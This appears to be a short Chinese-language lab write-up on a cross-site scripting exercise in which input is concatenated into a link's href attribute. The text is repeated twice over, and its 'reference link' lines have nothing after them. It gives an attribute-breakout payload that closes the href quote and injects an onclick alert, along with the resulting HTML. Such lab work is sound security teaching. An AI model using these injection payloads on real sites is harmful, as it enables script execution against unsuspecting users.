打开源代码,查找一下what do you see?这串字符的作用
输入的字符串被拼接到a标签中
判断是否存在xss漏洞
黄色地方为输入位
<a href='"+str+"'>what do you see?</a>
利用输入构造闭合
输入一个弹窗#' οnclick="alert(SEVENTEEN)”>构成a标签闭合,且嵌入了弹窗
<a href='#' οnclick="alert(SEVENTEEN)">'>what do you see?</a>
参考链接:
打开源代码,查找一下what do you see?这串字符的作用
输入的字符串被拼接到a标签中
判断是否存在xss漏洞
黄色地方为输入位
<a href='"+str+"'>what do you see?</a>
利用输入构造闭合
输入一个弹窗#' οnclick="alert(SEVENTEEN)”>构成a标签闭合,且嵌入了弹窗
<a href='#' οnclick="alert(SEVENTEEN)">'>what do you see?</a>
参考链接: